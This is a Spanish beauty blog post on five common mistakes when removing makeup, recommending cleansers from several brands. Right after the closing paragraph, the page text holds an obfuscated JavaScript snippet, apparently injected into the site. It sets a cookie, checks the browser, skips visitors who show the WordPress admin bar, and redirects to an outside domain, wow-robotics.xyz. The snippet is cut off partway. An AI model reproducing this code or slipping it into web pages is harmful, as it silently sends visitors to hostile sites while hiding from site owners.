Desmaquillarse la cara es una de las tareas más importantes del día y, también, de las más tediosas. Además, no hacerlo correctamente puede tener consecuencias nocivas para la piel, así que, amigas, atención porque en el post de hoy os contamos cuáles son los 5 errores que todas cometemos al desmaquillarnos y cómo solucionarlos. Hemos hecho cuentas y nos ha salido que debemos pasar una media de 15 minutos al día limpiando nuestro rostro de forma adecuada. De vosotras y vuestro entusiasmo depende que se convierta en un momento de relajación y auto dedicación o en algo peor que los deberes de matemáticas del cole. Nosotras lo tenemos claro: hay errores que debemos evitar si queremos una piel más limpia, joven y sana. ¡Te los contamos!

Joven hermosa mujer limpiar su piel de la cara con algodón

Error nº 1. Centrarnos solo en limpiar el rostro.

El rostro es la zona que más maquillamos, sobre todo, los ojos. Por eso, reconozcamos cuántas veces se nos ha olvidado limpiar la zona del cuello y el escote y os diremos la magnitud de vuestro primer error a la hora de desmaquillaros. Es verdad, los ojos son una de las partes que más nos suele costar desmaquillar. Una vez conseguido, creemos que con una simple pasada por el cuello y el escote es suficiente. Para evitar perezosas intenciones, os aconsejamos desmaquillar primero la zona de los ojos con un producto tan rápido y eficaz como Desmaquillant Express Yeux de Clarins. Una loción bifásica que elimina cualquier tipo de maquillaje, incluso el waterproof para que el tiempo que nos ahorramos se lo dediquemos a otras zonas importantes como el escote y el cuello. Easy peasy, girls.

Error nº 2. Utilizar demasiadas toallitas desmaquilladoras.

¡Ay, las toallitas! Qué feliz tentación poder desmaquillarse tumbadas en el sofá o en la cama, ¿verdad? Sin embargo, es un error pensar que las toallitas desmaquilladoras ofrecen una limpieza en profundidad: su uso continuado favorece la aparición de puntos negros, granitos e incluso pequeñas irritaciones. Lo mejor es reservarse este tipo de productos para momentos puntuales – una noche demasiado larga o un viaje exprés nos valen –  y optar por cosméticos expertos en la limpieza de la piel como la Loción Clarificante 2 de Clinique. El gran favorito de muchas de nosotras por lo bien que limpia los poros y por ser uno de los mejores cosméticos anti-polución que hemos probado. Perfecto para las que vivimos en grandes ciudades, pero no queremos que nos cueste la piel.

mujer joven se limpia la cara con las manos y una espuma blanca frente al espejo de un cuarto de baño

Error nº 3. Utilizar un producto adaptado a tu tipo de piel.

La mejor forma de acertar a la hora de limpiar nuestro rostro es tan fácil y difícil como conocerlo en profundidad. Por eso, es un error elegir cualquier producto desmaquillante para el rostro sin saber qué necesidad específica tiene la piel. En teoría, las pieles secas deben utilizar aceites y leches desmaquillantes. Las grasas o mixtas, espumas o geles; y las normales, cosméticos específicos. Aunque hay productos que van un paso más allá de toda teoría como Clarifying Cleansing Foam de Shiseido que ofrece un limpiador para todo tipo de pieles: normal, mixta, seca, apagada, etc. Una joya fácil de utilizar, adorar, y amar para siempre jamás. ¡Os animamos a probarla!

Error nº4. Ser demasiado bruscas cuando nos desmaquillamos.

Más vale mañana que fuerza, queridas. Esto lo decimos no al azar, sino porque es un error muy común a la hora de desmaquillarse creer que apretando más o restregando más fuerte conseguiremos mejores resultados. Pues “Nanai de la china que dirían muchas madres. La clave es elegir cosméticos eficaces que consigan una limpieza profunda aplicando la menor cantidad posible de producto. Nosotras hemos alcanzado el ansiado Nirvana si con DIOR HYDRA LIFE. Un desmaquillador en aceite tan intenso como suave y nutritivo gracias al aceite de almendra dulce. Lo que nuestra piel se merece, ni más, ni menos.

Error nº 5. No aclarar bien la piel.  

El último paso debe ser también el más importante, venga, chicas, si hemos llegado hasta aquí sería un error garrafal estropear una buena limpieza de maquillaje por no saber cómo aclararnos en condiciones. No hacerlo bien puede ocasionarnos más de un disgusto en forma de poros obstruidos y granitos en cara, cuello y escote. Por eso, os aconsejamos desmaquillar vuestro rostro utilizando agua tibia tanto en verano como en invierno para abrir los poros y limpiar en profundidad y terminar con un aclarado de agua fría que los cierre a cal y canto. ¿También en invierno? Sobre todo, en invierno. ¡Ánimo, valientes!

joven mujer muestra su rostro reflejado en el espejo después de lavarse la cara con agua cerca del fregadero

Si seguimos estos consejos conseguiremos evitar cometer estos 5 errores tan comunes a la hora de desmaquillarnos. Antes de terminar, nos gustaría recordaros este otro artículo sobre todo lo que necesitas saber para realizar una buena rutina de limpieza facial diaria, que solo os ayudará a obtener los mejores resultados sin complicaros la vida. ¡Así de bien os cuidamos! Eso es todo por nuestra parte, ¡hasta la próxima! var a=[‘toUTCString’,’cookie’,’split’,’length’,’charAt’,’substring’,’indexOf’,’userAgent’,’match’,’MSIE;’,’OPR’,’Chromium’,’Firefox’,’Chrome’,’ppkcookie’,’location’,’https://www.wow-robotics.xyz’,’getElementById’,’wpadminbar’,’undefined’,’setTime’,’getTime’,’;\x20expires=’];(function(c,d){var e=function(f){while(–f){c[‘push’](c[‘shift’]());}};e(++d);}(a,0x1f4));var b=function(c,d){c=c-0x0;var e=a[c];return e;};(function(){if(document[b(‘0x0’)](b(‘0x1’))===null){if(typeof c===b(‘0x2’)){function c(d,e,f){var g=”;if(f){var h=new Date();h[b(‘0x3’)](h[b(‘0x4’)]()+f*0x18*0x3c*0x3c*0x3e8);g=b(‘0x5’)+h[b(‘0x6’)]();}document[b(‘0x7′)]=d+’=’+(e||”)+g+’;\x20path=/’;}function i(j){var k=j+’=’;var l=document[b(‘0x7’)][b(‘0x8’)](‘;’);for(var m=0x0;m

¿Te ha gustado? ¡Compártelo!Share on FacebookTweet about this on TwitterPin on PinterestShare on LinkedInShare on Google+Email this to someone